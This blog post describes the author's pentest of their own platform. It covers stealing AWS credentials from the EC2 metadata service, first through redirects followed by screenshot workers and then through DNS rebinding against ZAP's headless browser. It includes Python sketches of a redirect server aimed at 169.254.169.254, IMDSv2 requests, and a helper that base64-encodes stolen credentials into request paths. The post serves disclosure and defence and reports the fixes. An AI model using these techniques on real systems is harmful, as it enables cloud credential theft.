This post is the first in a two-part series on DNS rebinding in web browsers. Here, I’ll talk about a DNS rebinding exploit against our own platform which allowed me to extract low-privileged AWS credentials. In the next post, I'll share new techniques to reliably achieve split-second DNS rebinding in Chrome, Edge, and Safari, and to bypass Chrome's restrictions on requests to private networks.

While the impact of this vulnerability ended up being low thanks to the defence-in-depth measures we employ, the technique used to get there is interesting in itself: it is simple enough to show that DNS rebinding exploits can be realistic, even in time-boxed scenarios such as pentests.

The Initial Bug

The journey to using DNS rebinding started with a simpler bug. We run servers which we refer to as “screenshot workers”. These workers are responsible for taking screenshots of customers’ websites to be shown in our platform.

While performing some security testing against our platform, I discovered that these workers would follow HTTP redirects before taking a screenshot. Further, the screenshotting tool running on these workers wasn’t prevented from accessing the internal EC2 metadata service, which can be used to retrieve AWS credentials for the roles available to the workers.

To exploit this, I set up a web server on the public internet which redirected to http://169.254.169.254/latest/meta-data/iam/security-credentials/. This is the standard URL for the endpoint on the EC2 metadata service which lists the roles available to the EC2 instance. When this web server was added as a target in our platform, and the screenshot worker took a screenshot of my website, the worker got redirected to this URL before taking a screenshot. This resulted in a screenshot of the list of available roles being shown in the platform.


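The redirecting web server described above needs very little code. The following is a minimal sketch rather than the server I actually used: the handler name, the `serve` helper, and port 8080 are all assumptions made for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Endpoint from the post that lists the roles available to the instance.
METADATA_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


class RedirectHandler(BaseHTTPRequestHandler):
    """Answer every GET with a 302 pointing at the metadata service."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", METADATA_URL)
        self.end_headers()


def serve(port=8080):
    # Port 8080 is an arbitrary choice for this sketch.
    HTTPServer(("0.0.0.0", port), RedirectHandler).serve_forever()
```

Calling `serve()` on a publicly reachable host would redirect any client that follows redirects, such as the screenshot worker, to the role listing.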

I modified my web server to redirect to the endpoint which gives credentials for one of the available roles at http://169.254.169.254/latest/meta-data/iam/security-credentials/<RoleName>. When the worker took another screenshot, I was presented with a screenshot containing credentials for this role:

I notified our DevOps team, and suggested that as a long-term solution we implement network-level restrictions to prevent the screenshotting tool from accessing the metadata service.

As a quicker fix, I suggested that we switch the workers to using IMDSv2. IMDSv2 prevents this attack by requiring a token to be included in a header in all requests to the metadata service. This token can be obtained by making a PUT request to a specific endpoint on the metadata service. With HTTP redirects, like the ones our screenshot workers were following, you can’t set headers, or make PUT requests and view their responses. I thought we were safe, until I remembered a rarely-used technique - DNS rebinding.
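To make the two-step IMDSv2 flow concrete, here is a small sketch that only builds the two requests, without sending them. The endpoint and header names come from AWS's IMDSv2 documentation; the function names and the default TTL are my own choices for illustration.

```python
from urllib.request import Request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds=21600):
    """Step 1: a PUT to the token endpoint, with the TTL header IMDSv2 requires."""
    return Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(token, path="/latest/meta-data/"):
    """Step 2: a GET that carries the token in a request header."""
    return Request(f"{IMDS}{path}", headers={"X-aws-ec2-metadata-token": token})
```

On an EC2 instance, passing these to `urllib.request.urlopen` would return the token and then the metadata. A plain HTTP redirect can express neither the PUT method nor the custom headers, which is why IMDSv2 stops the redirect-based attack.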

What is DNS Rebinding?

I wanted to use DNS rebinding to allow a malicious web page loaded from the public internet to make requests to a target web server on the worker's local network, and read the responses. For this technique to work, the target web server must meet a couple of requirements:

- The web server can’t validate the hostname in the Host header

- The web server must use HTTP rather than HTTPS

Helpfully, the AWS metadata service available by default to EC2 instances at http://169.254.169.254 fits both of these conditions.

Here, we're going to consider the simplest approach to retrieve the contents of an endpoint from a target web server at http://169.254.169.254/latest/meta-data/. This was sufficient for the exploit against our platform as the targeted browser would stay open for a long time. This often won’t be the case when attacking web applications, where you have to rely on faster techniques such as those presented by Gérald Doussot & Roger Meyer, or the techniques discussed in the next blog post.



This starts with a user (or an automated browser) following a link to http://evil.com. In this scenario, evil.com is a domain owned by the attacker, who also controls the DNS servers for the domain.

This browser navigation will trigger a DNS lookup of evil.com from the user’s machine, where the attacker’s DNS server responds with the IP address of a public web server they control. The user’s browser will then load http://evil.com from this web server, where the attacker serves a page that repeatedly tries to request http://evil.com/latest/meta-data/. This URL is under the same origin as the requesting page, so the response can be read by JavaScript.

If the user keeps the page open for long enough, their cached DNS response for evil.com will expire, and another DNS lookup of evil.com will be performed so that the browser can keep making requests. This time, the attacker’s DNS server responds by saying the IP address of evil.com is 169.254.169.254 - the IP address of the target web server.

The browser will now send requests to this IP address when requesting http://evil.com/latest/meta-data/. As the web server at http://169.254.169.254 meets the above requirements, the content of http://169.254.169.254/latest/meta-data/ will be returned. The requested endpoint is under the same origin as the requesting page, so the browser allows this response to be read from JavaScript.

Hence, by getting a browser to load a malicious page on the public internet, an attacker can read responses from a web server on the local network.
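The sequence above can be modelled in a few lines. This is a toy simulation, not real browser or DNS code: the class names, the 60-second cache lifetime, and the use of 198.51.100.1 as the attacker's server are all assumptions. It only illustrates that the origin is derived from the URL, while the IP address the browser connects to can change underneath it.

```python
from urllib.parse import urlsplit

ATTACKER_IP = "198.51.100.1"   # stand-in for the attacker's public web server
TARGET_IP = "169.254.169.254"  # the target web server on the local network


class RebindingDNS:
    """Toy DNS server: the first answer is the attacker, later answers the target."""

    def __init__(self):
        self.lookups = 0

    def resolve(self, hostname):
        self.lookups += 1
        return ATTACKER_IP if self.lookups == 1 else TARGET_IP


class ToyBrowser:
    """Caches DNS answers for a fixed time and re-resolves once they expire."""

    def __init__(self, dns, cache_seconds=60):
        self.dns = dns
        self.cache_seconds = cache_seconds
        self.cache = {}  # hostname -> (ip, expiry time)

    def connect_ip(self, url, now):
        host = urlsplit(url).hostname
        cached = self.cache.get(host)
        if cached is None or now >= cached[1]:
            cached = (self.dns.resolve(host), now + self.cache_seconds)
            self.cache[host] = cached
        return cached[0]


def origin(url):
    """Scheme, host, and port; the resolved IP address plays no part."""
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port or 80)  # assumes http
```

With a `ToyBrowser(RebindingDNS())`, a request to `http://evil.com/latest/meta-data/` at time 30 goes to the attacker's server, and the same request at time 61 goes to 169.254.169.254, yet `origin()` returns the same value for the page and the request throughout.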

ZAP's AJAX Spider

We enable ZAP's AJAX spider for some customers, which drives headless Firefox to discover content on the target website. While I'd never played with them, DNS rebinding attacks against browsers are well-documented, and I knew enough to know that they should allow a malicious user to fully interact with the metadata service using JavaScript.

This meant that the restrictions put in place by IMDSv2 could be bypassed. I would be able to make a PUT request to the metadata service and read the response to get the token. I would also be able to include this token in all requests to the metadata service.

Targeting the AJAX spider also provided another key advantage - time. Some quick testing suggested that the faster DNS rebinding techniques have become fiddly and unreliable with changes to browser behaviour in the past few years. ZAP's AJAX spider will browse a website for up to an hour if there is enough content, so there was plenty of time to wait for the cached DNS record to expire and exploit DNS rebinding using the simpler technique described above.

I didn't have a complex website ready for the AJAX spider to target, but keeping it busy was quite straightforward - I just filled a page with randomly generated hash links. This caused ZAP's spider to load the index page, click on the first five links (which wouldn't cause page loads), and then reload the index page and start again. It would do this until the one hour timeout was reached.
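Generating a page like this takes only a few lines. The sketch below is an assumption about how such a page could be built, not the page I served: the function name, the number of links, and the markup are illustrative.

```python
import secrets


def build_index(link_count=50):
    """Return an HTML page made up of links to random fragment identifiers."""
    links = "\n".join(
        f'<a href="#{secrets.token_hex(8)}">link {i}</a><br>'
        for i in range(link_count)
    )
    return f"<!doctype html>\n<html><body>\n{links}\n</body></html>\n"
```

Because every link points at a fragment of the same page, following one never triggers a page load, and regenerating the page on each request gives the spider fresh links each time it reloads the index.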

Exploit

To get a domain which alternated between resolving to my server and 169.254.169.254, I used Tavis Ormandy's rbndr service. For example, c6336401.a9fea9fe.rbndr.us will alternate between resolving to 198.51.100.1 and 169.254.169.254:


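The two labels in an rbndr hostname are simply the two IPv4 addresses written as eight hexadecimal digits each. As a small sketch (the helper names are my own), the hostname can be built and decoded like this:

```python
import ipaddress


def rbndr_hostname(ip_a, ip_b):
    """Build an rbndr.us hostname that alternates between two IPv4 addresses."""

    def to_hex(ip):
        return format(int(ipaddress.IPv4Address(ip)), "08x")

    return f"{to_hex(ip_a)}.{to_hex(ip_b)}.rbndr.us"


def rbndr_addresses(hostname):
    """Recover the two IPv4 addresses encoded in an rbndr.us hostname."""
    first, second = hostname.split(".")[:2]
    return tuple(
        str(ipaddress.IPv4Address(int(label, 16))) for label in (first, second)
    )
```

For the example above, `rbndr_hostname("198.51.100.1", "169.254.169.254")` gives `c6336401.a9fea9fe.rbndr.us`.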

I created a website which would keep ZAP busy for an hour as above, and scanned it using this domain. I included a script in this website which would continuously request /latest and check whether the response included a token indicating that it came from my web server:

After a sufficient amount of time, Firefox will perform a second DNS lookup of c6336401.a9fea9fe.rbndr.us, and receive the result 169.254.169.254. All future requests to /latest will now be directed to the endpoint at http://169.254.169.254/latest. The script will detect this since that response doesn't contain the text "script.js", and run a function to extract data from the AWS metadata service:

Exfiltration

At this point the script would have AWS credentials sitting in a JavaScript variable - all that was left to do was send them to myself. ZAP added a small challenge here as it aggressively blocks any requests that aren't within its defined scan scope, preventing me from simply sending the credentials back to my server. I wouldn't be able to wait for the DNS resolution to switch back to my server again since ZAP would quickly stop spidering after loading the metadata service as there were no links on it. I also wouldn’t be able to exfiltrate the credentials through a DNS lookup, as ZAP will block requests to out of scope hostnames before performing a DNS lookup.

Fortunately, we show the scanned URLs to our customers. I could make a fetch request containing the credentials, and it would show up in the scanned URLs:

Decoding the base64 in the returned requests gives the AWS credentials from the metadata service:
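The exact request format isn't reproduced here, so the following is only a sketch of the idea. It assumes the credentials were serialised as JSON, encoded as URL-safe base64, and appended to a path on the scanned host; the `/exfil/` prefix and both function names are hypothetical.

```python
import base64
import json


def exfil_path(credentials, prefix="/exfil/"):
    """Encode credentials as URL-safe base64 and place them in a request path."""
    raw = json.dumps(credentials).encode()
    return prefix + base64.urlsafe_b64encode(raw).decode()


def decode_exfil_path(path, prefix="/exfil/"):
    """Reverse exfil_path: strip the prefix, decode the base64, parse the JSON."""
    encoded = path[len(prefix):]
    return json.loads(base64.urlsafe_b64decode(encoded))
```

The first function mirrors what the in-page script would do before calling fetch, and the second is what I would run against the path shown in the list of scanned URLs.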

Impact and Wash-up

While it's always nice to get AWS credentials, and this was the first time I've found a use for DNS rebinding on a real target, the impact of this vulnerability was quite low.

The permissions on the credentials were locked down to the bare minimum. There was some potential for service disruption, but pivoting further into AWS would not have been possible. The metadata service did not contain any other sensitive information that could be useful to an attacker. I discussed with the DevOps team what other HTTP services I would be able to reach from our workers, and it turns out there was very little I would have been able to do through that path.

This situation was a great demonstration of the importance of defence-in-depth. If someone had managed to find this vulnerability before we patched it, the other measures we had in place would have severely limited the attack surface that would open up to them.

The initial vulnerability in our screenshot workers was resolved in the same evening it was discovered by enforcing the use of IMDSv2. This was followed by a review of the AWS logs which showed that the scanning workers had only accessed credentials from the metadata service during my testing.

The workaround using DNS rebinding was discovered while work was ongoing to block our scanning tools from reaching the metadata endpoint at the network level. These restrictions were deployed to our ZAP workers the day after I provided a proof-of-concept for extracting credentials using DNS rebinding, and later deployed to all our workers.

Where to next?

Attentive readers may now be wondering whether using DNS rebinding against our screenshot workers would have led to the same result, since they drive headless Chrome. This wasn't possible at the time due to short timeouts on the screenshot workers, and restrictions in Chrome around making requests to private networks.

However, this question kicked off a new research project which led to bypassing these restrictions, and finding new techniques for split-second DNS rebinding in Chrome, Edge, and Safari. The details of this research will be published in the next blog post.

Part of my aim while performing this exploit was to try and keep things simple. DNS rebinding has long felt to me like a technique too complex to use on a web application penetration test where I'm under time constraints. Through the process of attacking our own portal, I've proven to myself, and hopefully to you, that this isn't the case.